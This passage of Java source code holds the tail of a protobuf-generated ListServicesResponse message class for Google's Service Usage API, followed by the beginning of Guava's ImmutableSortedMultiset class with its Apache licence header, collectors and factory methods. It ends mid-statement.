return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < services_.size(); i++) { output.writeMessage(1, services_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < services_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, services_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.api.serviceusage.v1.ListServicesResponse)) { return super.equals(obj); } com.google.api.serviceusage.v1.ListServicesResponse other = (com.google.api.serviceusage.v1.ListServicesResponse) obj; if (!getServicesList().equals(other.getServicesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getServicesCount() > 0) { hash = (37 * hash) + SERVICES_FIELD_NUMBER; hash = (53 * hash) + getServicesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.api.serviceusage.v1.ListServicesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for the `ListServices` method. * </pre> * * Protobuf type {@code google.api.serviceusage.v1.ListServicesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.api.serviceusage.v1.ListServicesResponse) com.google.api.serviceusage.v1.ListServicesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.api.serviceusage.v1.ListServicesResponse.class, com.google.api.serviceusage.v1.ListServicesResponse.Builder.class); } // Construct using com.google.api.serviceusage.v1.ListServicesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (servicesBuilder_ == null) { services_ = java.util.Collections.emptyList(); } else { services_ = null; servicesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstanceForType() { return com.google.api.serviceusage.v1.ListServicesResponse.getDefaultInstance(); } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse build() { com.google.api.serviceusage.v1.ListServicesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse buildPartial() { com.google.api.serviceusage.v1.ListServicesResponse result = new com.google.api.serviceusage.v1.ListServicesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.api.serviceusage.v1.ListServicesResponse result) { if (servicesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { services_ = java.util.Collections.unmodifiableList(services_); bitField0_ = (bitField0_ & ~0x00000001); } result.services_ = services_; } else { result.services_ = servicesBuilder_.build(); } } private void buildPartial0(com.google.api.serviceusage.v1.ListServicesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.api.serviceusage.v1.ListServicesResponse) { return mergeFrom((com.google.api.serviceusage.v1.ListServicesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.api.serviceusage.v1.ListServicesResponse other) { if (other == com.google.api.serviceusage.v1.ListServicesResponse.getDefaultInstance()) return this; if (servicesBuilder_ == null) { if (!other.services_.isEmpty()) { if (services_.isEmpty()) { services_ = other.services_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureServicesIsMutable(); services_.addAll(other.services_); } onChanged(); } } else { if (!other.services_.isEmpty()) { if (servicesBuilder_.isEmpty()) { servicesBuilder_.dispose(); servicesBuilder_ = null; services_ = other.services_; bitField0_ = (bitField0_ & ~0x00000001); servicesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getServicesFieldBuilder() : null; } else { servicesBuilder_.addAllMessages(other.services_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.api.serviceusage.v1.Service m = input.readMessage( com.google.api.serviceusage.v1.Service.parser(), extensionRegistry); if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(m); } else { servicesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.api.serviceusage.v1.Service> services_ = java.util.Collections.emptyList(); private void ensureServicesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { services_ = new java.util.ArrayList<com.google.api.serviceusage.v1.Service>(services_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder> servicesBuilder_; /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<com.google.api.serviceusage.v1.Service> getServicesList() { if (servicesBuilder_ == null) { return java.util.Collections.unmodifiableList(services_); } else { return servicesBuilder_.getMessageList(); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public int getServicesCount() { if (servicesBuilder_ == null) { return services_.size(); } else { return servicesBuilder_.getCount(); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service getServices(int index) { if (servicesBuilder_ == null) { return services_.get(index); } else { return servicesBuilder_.getMessage(index); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder setServices(int index, com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.set(index, value); onChanged(); } else { servicesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder setServices( int index, com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.set(index, builderForValue.build()); onChanged(); } else { servicesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.add(value); onChanged(); } else { servicesBuilder_.addMessage(value); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(int index, com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.add(index, value); onChanged(); } else { servicesBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(builderForValue.build()); onChanged(); } else { servicesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices( int index, com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(index, builderForValue.build()); onChanged(); } else { servicesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addAllServices( java.lang.Iterable<? extends com.google.api.serviceusage.v1.Service> values) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, services_); onChanged(); } else { servicesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder clearServices() { if (servicesBuilder_ == null) { services_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { servicesBuilder_.clear(); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder removeServices(int index) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.remove(index); onChanged(); } else { servicesBuilder_.remove(index); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder getServicesBuilder(int index) { return getServicesFieldBuilder().getBuilder(index); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.ServiceOrBuilder getServicesOrBuilder(int index) { if (servicesBuilder_ == null) { return services_.get(index); } else { return servicesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<? extends com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesOrBuilderList() { if (servicesBuilder_ != null) { return servicesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(services_); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder addServicesBuilder() { return getServicesFieldBuilder() .addBuilder(com.google.api.serviceusage.v1.Service.getDefaultInstance()); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder addServicesBuilder(int index) { return getServicesFieldBuilder() .addBuilder(index, com.google.api.serviceusage.v1.Service.getDefaultInstance()); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<com.google.api.serviceusage.v1.Service.Builder> getServicesBuilderList() { return getServicesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesFieldBuilder() { if (servicesBuilder_ == null) { servicesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder>( services_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); services_ = null; } return servicesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.api.serviceusage.v1.ListServicesResponse) } // @@protoc_insertion_point(class_scope:google.api.serviceusage.v1.ListServicesResponse) private static final com.google.api.serviceusage.v1.ListServicesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.api.serviceusage.v1.ListServicesResponse(); } public static com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListServicesResponse> PARSER = new com.google.protobuf.AbstractParser<ListServicesResponse>() { @java.lang.Override public ListServicesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListServicesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListServicesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/guava
36,031
android/guava/src/com/google/common/collect/ImmutableSortedMultiset.java
/* * Copyright (C) 2011 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the * License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.collect; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.base.Preconditions.checkNotNull; import com.google.common.annotations.GwtIncompatible; import com.google.common.annotations.J2ktIncompatible; import com.google.common.annotations.VisibleForTesting; import com.google.common.math.IntMath; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.errorprone.annotations.DoNotCall; import com.google.errorprone.annotations.concurrent.LazyInit; import java.io.InvalidObjectException; import java.io.ObjectInputStream; import java.io.Serializable; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.Comparator; import java.util.Iterator; import java.util.List; import java.util.function.Function; import java.util.function.ToIntFunction; import java.util.stream.Collector; import org.jspecify.annotations.Nullable; /** * A {@link SortedMultiset} whose contents will never change, with many other important properties * detailed at {@link ImmutableCollection}. * * <p><b>Warning:</b> as with any sorted collection, you are strongly advised not to use a {@link * Comparator} or {@link Comparable} type whose comparison behavior is <i>inconsistent with * equals</i>. That is, {@code a.compareTo(b)} or {@code comparator.compare(a, b)} should equal zero * <i>if and only if</i> {@code a.equals(b)}. If this advice is not followed, the resulting * collection will not correctly obey its specification. * * <p>See the Guava User Guide article on <a href= * "https://github.com/google/guava/wiki/ImmutableCollectionsExplained">immutable collections</a>. * * @author Louis Wasserman * @since 12.0 */ @GwtIncompatible // hasn't been tested yet public abstract class ImmutableSortedMultiset<E> extends ImmutableMultiset<E> implements SortedMultiset<E> { // TODO(lowasser): GWT compatibility /** * Returns a {@code Collector} that accumulates the input elements into a new {@code * ImmutableMultiset}. Elements are sorted by the specified comparator. * * <p><b>Warning:</b> {@code comparator} should be <i>consistent with {@code equals}</i> as * explained in the {@link Comparator} documentation. * * @since 33.2.0 (available since 21.0 in guava-jre) */ @IgnoreJRERequirement // Users will use this only if they're already using streams. public static <E> Collector<E, ?, ImmutableSortedMultiset<E>> toImmutableSortedMultiset( Comparator<? super E> comparator) { return toImmutableSortedMultiset(comparator, Function.identity(), e -> 1); } /** * Returns a {@code Collector} that accumulates elements into an {@code ImmutableSortedMultiset} * whose elements are the result of applying {@code elementFunction} to the inputs, with counts * equal to the result of applying {@code countFunction} to the inputs. * * <p>If the mapped elements contain duplicates (according to {@code comparator}), the first * occurrence in encounter order appears in the resulting multiset, with count equal to the sum of * the outputs of {@code countFunction.applyAsInt(t)} for each {@code t} mapped to that element. * * @since 33.2.0 (available since 22.0 in guava-jre) */ @IgnoreJRERequirement // Users will use this only if they're already using streams. public static <T extends @Nullable Object, E> Collector<T, ?, ImmutableSortedMultiset<E>> toImmutableSortedMultiset( Comparator<? super E> comparator, Function<? super T, ? extends E> elementFunction, ToIntFunction<? super T> countFunction) { checkNotNull(comparator); checkNotNull(elementFunction); checkNotNull(countFunction); return Collector.of( () -> TreeMultiset.create(comparator), (multiset, t) -> mapAndAdd(t, multiset, elementFunction, countFunction), (multiset1, multiset2) -> { multiset1.addAll(multiset2); return multiset1; }, (Multiset<E> multiset) -> copyOfSortedEntries(comparator, multiset.entrySet())); } @IgnoreJRERequirement // helper for toImmutableSortedMultiset /* * If we make these calls inline inside toImmutableSortedMultiset, we get an Animal Sniffer error, * despite the @IgnoreJRERequirement annotation there. My assumption is that, because javac * generates a synthetic method for the body of the lambda, the actual method calls that Animal * Sniffer is flagging don't appear inside toImmutableSortedMultiset but rather inside that * synthetic method. By moving those calls to a named method, we're able to apply * @IgnoreJRERequirement somewhere that it will help. */ private static <T extends @Nullable Object, E> void mapAndAdd( T t, Multiset<E> multiset, Function<? super T, ? extends E> elementFunction, ToIntFunction<? super T> countFunction) { multiset.add(checkNotNull(elementFunction.apply(t)), countFunction.applyAsInt(t)); } /** * Returns the empty immutable sorted multiset. * * <p><b>Performance note:</b> the instance returned is a singleton. */ @SuppressWarnings("unchecked") public static <E> ImmutableSortedMultiset<E> of() { return (ImmutableSortedMultiset) RegularImmutableSortedMultiset.NATURAL_EMPTY_MULTISET; } /** Returns an immutable sorted multiset containing a single element. */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1) { RegularImmutableSortedSet<E> elementSet = (RegularImmutableSortedSet<E>) ImmutableSortedSet.of(e1); long[] cumulativeCounts = {0, 1}; return new RegularImmutableSortedMultiset<>(elementSet, cumulativeCounts, 0, 1); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any element is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1, E e2) { return copyOf(Ordering.natural(), Arrays.asList(e1, e2)); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any element is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1, E e2, E e3) { return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3)); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any element is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of( E e1, E e2, E e3, E e4) { return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3, e4)); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any element is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of( E e1, E e2, E e3, E e4, E e5) { return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3, e4, e5)); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any element is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of( E e1, E e2, E e3, E e4, E e5, E e6, E... remaining) { int size = remaining.length + 6; List<E> all = Lists.newArrayListWithCapacity(size); Collections.addAll(all, e1, e2, e3, e4, e5, e6); Collections.addAll(all, remaining); return copyOf(Ordering.natural(), all); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * @throws NullPointerException if any of {@code elements} is null */ public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> copyOf(E[] elements) { return copyOf(Ordering.natural(), Arrays.asList(elements)); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. To create a copy of a {@code SortedMultiset} that preserves the comparator, call * {@link #copyOfSorted} instead. This method iterates over {@code elements} at most once. * * <p>Note that if {@code s} is a {@code Multiset<String>}, then {@code * ImmutableSortedMultiset.copyOf(s)} returns an {@code ImmutableSortedMultiset<String>} * containing each of the strings in {@code s}, while {@code ImmutableSortedMultiset.of(s)} * returns an {@code ImmutableSortedMultiset<Multiset<String>>} containing one element (the given * multiset itself). * * <p>Despite the method name, this method attempts to avoid actually copying the data when it is * safe to do so. The exact circumstances under which a copy will or will not be performed are * undocumented and subject to change. * * <p>This method is not type-safe, as it may be called on elements that are not mutually * comparable. * * @throws ClassCastException if the elements are not mutually comparable * @throws NullPointerException if any of {@code elements} is null */ public static <E> ImmutableSortedMultiset<E> copyOf(Iterable<? extends E> elements) { // Hack around E not being a subtype of Comparable. // Unsafe, see ImmutableSortedMultisetFauxverideShim. @SuppressWarnings("unchecked") Ordering<E> naturalOrder = (Ordering<E>) Ordering.<Comparable<?>>natural(); return copyOf(naturalOrder, elements); } /** * Returns an immutable sorted multiset containing the given elements sorted by their natural * ordering. * * <p>This method is not type-safe, as it may be called on elements that are not mutually * comparable. * * @throws ClassCastException if the elements are not mutually comparable * @throws NullPointerException if any of {@code elements} is null */ public static <E> ImmutableSortedMultiset<E> copyOf(Iterator<? extends E> elements) { // Hack around E not being a subtype of Comparable. // Unsafe, see ImmutableSortedMultisetFauxverideShim. @SuppressWarnings("unchecked") Ordering<E> naturalOrder = (Ordering<E>) Ordering.<Comparable<?>>natural(); return copyOf(naturalOrder, elements); } /** * Returns an immutable sorted multiset containing the given elements sorted by the given {@code * Comparator}. * * @throws NullPointerException if {@code comparator} or any of {@code elements} is null */ public static <E> ImmutableSortedMultiset<E> copyOf( Comparator<? super E> comparator, Iterator<? extends E> elements) { checkNotNull(comparator); return new Builder<E>(comparator).addAll(elements).build(); } /** * Returns an immutable sorted multiset containing the given elements sorted by the given {@code * Comparator}. This method iterates over {@code elements} at most once. * * <p>Despite the method name, this method attempts to avoid actually copying the data when it is * safe to do so. The exact circumstances under which a copy will or will not be performed are * undocumented and subject to change. * * @throws NullPointerException if {@code comparator} or any of {@code elements} is null */ public static <E> ImmutableSortedMultiset<E> copyOf( Comparator<? super E> comparator, Iterable<? extends E> elements) { if (elements instanceof ImmutableSortedMultiset) { @SuppressWarnings("unchecked") // immutable collections are always safe for covariant casts ImmutableSortedMultiset<E> multiset = (ImmutableSortedMultiset<E>) elements; if (comparator.equals(multiset.comparator())) { if (multiset.isPartialView()) { return copyOfSortedEntries(comparator, multiset.entrySet().asList()); } else { return multiset; } } } return new 